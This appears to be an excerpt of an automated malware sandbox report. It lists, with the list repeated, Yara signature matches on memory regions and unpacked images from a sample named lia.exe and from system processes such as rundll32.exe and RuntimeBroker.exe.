Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |